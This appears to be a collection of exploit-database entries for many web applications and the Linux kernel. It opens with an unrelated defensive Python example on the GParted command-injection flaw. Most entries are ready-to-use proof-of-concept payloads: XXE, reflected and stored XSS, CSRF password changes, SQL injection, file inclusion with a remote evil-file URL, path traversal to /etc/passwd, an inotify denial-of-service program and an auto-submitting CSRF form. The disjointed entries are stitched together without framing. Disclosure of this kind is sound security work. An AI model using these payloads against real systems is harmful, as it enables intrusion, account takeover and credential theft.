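The GParted issue is a textbook case of untrusted data (a filesystem label) being interpolated into a command string that a shell then interprets. The Python below is an added example, not GParted's code or part of the advisory: it contrasts the string-building pattern with passing the label as a single argv element, where no shell ever sees it, and shows `shlex.quote` for the case where a shell really is unavoidable. Instead of calling `umount`, the child-process check runs the current Python interpreter so that it works anywhere without touching block devices; the label value is taken from the advisory's PoC, and the metacharacter list in `contains_shell_metacharacters` is an assumed, illustrative set.

```python
import shlex
import subprocess
import sys

# Label value from the advisory's PoC: a shell would treat the backticks as a
# command substitution if the label were pasted into a command line.
HOSTILE_LABEL = "`reboot`"


def shell_command_for_label(label):
    """The unsafe pattern: one string handed to a shell. Only builds the string;
    never executes it, because the shell would expand the backticks."""
    return "umount /media/" + label


def argv_for_label(label):
    """The safe pattern: the label is one argv element. execve() delivers the
    backticks to umount as literal characters; no shell is involved."""
    return ["umount", "/media/" + label]


def quoted_shell_command_for_label(label):
    """If a shell is genuinely required, quote every untrusted element first."""
    return "umount " + shlex.quote("/media/" + label)


def label_seen_by_child(label):
    """Run a child with the argv approach and return the argument it actually
    received. Uses the Python interpreter as a stand-in for umount."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", "/media/" + label],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def contains_shell_metacharacters(value):
    """Boundary check: flag labels carrying characters a POSIX shell interprets.
    This is a second layer on top of argv execution, not a replacement for it."""
    return any(ch in value for ch in "`$;&|<>(){}\n\"'\\")


if __name__ == "__main__":
    print("unsafe string  :", shell_command_for_label(HOSTILE_LABEL))
    print("argv           :", argv_for_label(HOSTILE_LABEL))
    print("quoted string  :", quoted_shell_command_for_label(HOSTILE_LABEL))
    print("child received :", label_seen_by_child(HOSTILE_LABEL))
    print("metacharacters :", contains_shell_metacharacters(HOSTILE_LABEL))
```

The point the fix in GParted 0.15 relies on is the second function: once each parameter travels as its own argv element, there is nothing left to escape, and the quoting helper is only needed for code paths that still go through `sh -c`.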
-
NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities
SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
=======================================================================
              title: Multiple high risk vulnerabilities
            product: NetIQ Access Manager
 vulnerable version: 4.0 SP1
      fixed version: 4.0 SP1 Hot Fix 3
         CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, CVE-2014-5217
             impact: High
           homepage: https://www.netiq.com/
              found: 2014-10-29
                 by: W. Ettlinger
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"As demands for secure web access expand and delivery becomes increasingly
complex, organizations face some formidable challenges. Access Manager
provides a simple yet secure and scalable solution that can handle all your
web access needs—both internal as well as in the cloud."

URL: https://www.netiq.com/products/access-manager/

Business recommendation:
------------------------
An attacker without an account on the NetIQ Access Manager is able to gain
administrative access by combining different attack vectors. Though this host
may not always be accessible from a public network, an attacker is still able
to compromise the system when directly targeting administrative users.

Because the NetIQ Access Manager is used for authentication, an attacker
compromising the system can use it to gain access to other systems.

SEC Consult highly recommends that this software is not used until a full
security review has been performed and all issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
Authenticated administrative users can download arbitrary files from the
Access Manager administration interface as the user "novlwww".

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015993

2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
Multiple reflected cross site scripting vulnerabilities were found. These
allow effective attacks of administrative and SSLVPN sessions.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015994

3) Persistent Cross Site Scripting (XSS, CVE-2014-5216)
A persistent cross site scripting vulnerability was found. This allows
effective attacks of administrative and SSLVPN sessions.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015996

4) Cross Site Request Forgery (CVE-2014-5217)
The Access Manager administration interface does not have CSRF protection.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015997

5) Information Disclosure (CVE-2014-5215)
Authenticated users of the administration interface can gain authentication
information of internal administrative users.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015995

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!

Proof of concept:
-----------------
1) XML eXternal Entity Injection (XXE)
As an example, the following URL demonstrates the retrieval of the /etc/passwd
file as an authenticated administrative user:

https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>

2) Reflected Cross Site Scripting (XSS)
The following URLs demonstrate different reflected XSS flaws in the
administration interface and the user interface.

https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'
https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

3) Persistent Cross Site Scripting (XSS)
The following URL injects a stored script on the auditing page:

https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289

4) Cross Site Request Forgery
As an example, an attacker is able to change the administration password to
'12345' by issuing a GET request in the context of an authenticated
administrator. The old password is not necessary for this attack!

https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345

5) Information Disclosure
The following URLs disclose several pieces of useful information to an
authenticated account:

https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp
https://<host>:8443/roma/jsp/debug/debug.jsp

The disclosed system properties:
com.volera.vcdn.monitor.password
com.volera.vcdn.alert.password
com.volera.vcdn.sync.password
com.volera.vcdn.scheduler.password
com.volera.vcdn.publisher.password
com.volera.vcdn.application.sc.scheduler.password
com.volera.vcdn.health.password

The static string "k~jd)*L2;93=Gjs" is XORed with these values in order to
decrypt passwords of internally used service accounts.

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the NetIQ Access Manager
version 4.0 SP1, which was the most recent version at the time of discovery.

Vendor contact timeline:
------------------------
2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys
2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-12-16: Novell: the vulnerability fixes will be released tomorrow; The CSRF vulnerability will not be fixed immediately ("Since this can be done only after an authorized login"); two XSS vulnerabilities can not be exploited ("We could not take advantage or retrieve any cookie info on the server side - it looks like it's a client side cross scripting attack.")
2014-12-16: Explaining why those vulnerabilities can be exploited
2014-12-17: Novell: Fix will be released tomorrow
2014-12-17: Verifying release of advisory tomorrow
2014-12-18: Novell: Advisory can be released
2014-12-18: Coordinated release of security advisory

Solution:
---------
Update to the latest available version of Access Manager and implement the
workarounds mentioned in the KB articles by Novell linked above.

Workaround:
-----------
For some vulnerabilities, Novell provides best practice recommendations in the
URLs linked above.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

EOF W. Ettlinger / @2014
-
eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47273/info

eGroupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

eGroupware 1.8.001 is vulnerable; other versions may also be affected.

http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
-
FiberHome HG-110 - Cross-Site Scripting / Directory Traversal
source: https://www.securityfocus.com/bid/47277/info

Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks.

Fiberhome HG-110 firmware 1.0.0 is vulnerable; other versions may also be affected.

The following example URIs are available:

Cross-Site Scripting:
http://www.example.com/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal:
http://www.example.com/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns
-
1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities
source: https://www.securityfocus.com/bid/47282/info

1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process and gain access to sensitive information.

1024cms 1.1.0 beta is vulnerable; other versions may also be affected.

http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
http://www.example.com/index.php?act=../../../../../../etc/passwd%00
http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
-
Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service
/*
source: https://www.securityfocus.com/bid/47296/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
*/

#include <sys/inotify.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int fds[2];

    /* Circumvent max inotify instances limit */
    while (pipe(fds) != -1)
        ;

    while (1)
        inotify_init();

    return 0;
}
-
Dimac CMS 1.3 XS - 'default.asp' SQL Injection
source: https://www.securityfocus.com/bid/47291/info

Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Dimac CMS XS 1.3 is vulnerable; other versions may also be affected.

The following example URI and data are available:

http://www.example.com/[path]/CMSadmin/default.asp
Username : admin
Password : 1'or'1'='1
-
Etki Video PRO 2.0 - 'izle.asp?id' SQL Injection
source: https://www.securityfocus.com/bid/47298/info

Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Etki Video Pro 2.0 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/izle.asp?id=254 [SQL Injection]
-
Etki Video PRO 2.0 - 'kategori.asp?cat' SQL Injection
source: https://www.securityfocus.com/bid/47298/info

Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Etki Video Pro 2.0 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection]
-
WordPress Theme Live Wire 2.3.1 - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/47299/info

Live Wire for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.

Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.

Live Wire for Wordpress 2.3.1 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=jpg
http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1
-
eForum 1.1 - 'eforum.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/47309/info

eForum is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.

eForum 1.1 is vulnerable; other versions may also be affected.

if (isset($_FILES)) {
    //upload attachments
    ...snip...
    $invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess');
    $uploaddir = $eforum->path.'/upload';
    $upfiles = $_FILES['efattachment'];
    foreach ($upfiles['name'] as $idx => $upname) {
        if ($upname != '') {
            $source = $upfiles['tmp_name'][$idx];
            if (is_uploaded_file($source)) {
                if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) {
                    continue;
                }
-
Lazarus Guestbook 1.22 - Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Exploit Title: Lazarus Guestbook 1.22 Multiple Persistent Cross-Site Scripting - SQL Injection Vulnerability
# Date: 23/12/2014
# Url Vendor: http://carbonize.co.uk/Lazarus/
# Vendor Name: Lazarus
# Version: 1.22
# CVE: CVE-2014-2239
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High

#Description
Lazarus is a free guestbook script written in PHP that uses your MySQL database for storage and is based upon the excellent Advanced Guestbook script from Proxy2. I took the Advanced Guestbook and added more features and several layers of anti-spam protection to make one of the most feature-rich and spam-resistant guestbook scripts available for free. I am always active on the forums and you can rest assured that if the spammers find a way past the current anti-spam methods, I have others waiting in the wings. You can read my own guestbook to see what other people have had to say about Lazarus and my anti-spam fixes for Advanced Guestbook.
---------------------------------
+ MULTIPLE CROSS SITE SCRIPTING +
---------------------------------

#Exploiting Description
- Multiple persistent cross-site scripting in several input fields of the platform.

#P0c [1]: Enter the XSS code in the ad block box
<textarea class="input" id="ad_code" name="ad_code" wrap="virtual" rows="14" cols="41">CODE XSS</textarea>

#P0c [2]: Enter the XSS code in the smile name box
<input type="text" size="25" value="CODE XSS" name="s_emotion">

#P0c [3]: Enter the XSS code in the font style box
<input type="text" class="input" maxlength="70" size="38" value="CODE XSS" name="font_face">

#P0c [4]: Enter the XSS code in the security box
<input type="text" class="input" value="CODE XSS" size="29" name="comment_pass">

#P0c [5]: Enter the XSS code in the email notification box
<input type="text" class="input" maxlength="60" size="30" value="CODE XSS" name="book_mail">

#P0c [6]: Enter the XSS code in the tags box
<input type="text" class="input" maxlength="60" size="30" value="CODE XSS" name="allowed_tags">

#Proof Concept
http://i.imgur.com/sczND0w.jpg
http://i.imgur.com/SNMFRCV.jpg
http://i.imgur.com/OR2RTc1.jpg
http://i.imgur.com/xNX6Ln0.jpg
http://i.imgur.com/dlqSpLM.jpg
http://i.imgur.com/JESZTCz.jpg

------------------------
+ SQL INJECTION +
------------------------

# Exploiting Description
- SQL injection in the control panel of the admin and other users.

#P0c
http://site.com/lazarus/admin.php?action=settings&panel=general&gbsession="RANDOM_TOKEN"&uid=[sql]

#Proof Concept
http://i.imgur.com/36JamRc.jpg
-
MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution
source: https://www.securityfocus.com/bid/47310/info

MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'.

An attacker may exploit this issue to execute arbitrary code with superuser privileges. Failed attempts will cause the affected application to crash, denying service to legitimate users. A successful exploit will completely compromise affected computers.

MIT Kerberos 5 1.7 and later are vulnerable.

NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue.

# nmap -n -sV krb01
-
WordPress Plugin Spellchecker 3.1 - '/general.php' Local/Remote File Inclusion
source: https://www.securityfocus.com/bid/47317/info

The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.

Spellchecker 3.1 is vulnerable; other versions may also be affected.

The following example URIs are available:

http://www.example.com/general.php?file=http://sitename.com/Evil.txt?
http://www.example.com/general.php?file=../../../../../../../etc/passwd
-
WordPress Theme The Gazette Edition 2.9.4 - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/47320/info

The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.

Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.

Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable.

http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1
-
Website Baker 2.8.1 - Multiple SQL Injections
source: https://www.securityfocus.com/bid/47332/info

Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Website Baker 2.8.1 is vulnerable; other versions may also be affected.

POST /admin/users/add.php HTTP/1.1

user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add

POST /admin/groups/add.php HTTP/1.1

advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add
-
Plogger 1.0 RC1 - 'gallery_name' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47329/info

Plogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.

<form action="http://host/plog-admin/plog-options.php" method="post">
  <input type="hidden" name="gallery_name" value='my gallery"><script>alert(document.cookie)</script>'>
  <input type="hidden" name="gallery_url" value="http://host/">
  <input type="hidden" name="admin_username" value="Ildar">
  <input type="hidden" name="admin_email" value="valeevildar@ya.ru">
  <input type="hidden" name="admin_password" value="">
  <input type="hidden" name="confirm_admin_password" value="">
  <input type="submit" id="btn" name="submit" value="Update Options">
</form>
<script>
  document.getElementById('btn').click();
</script>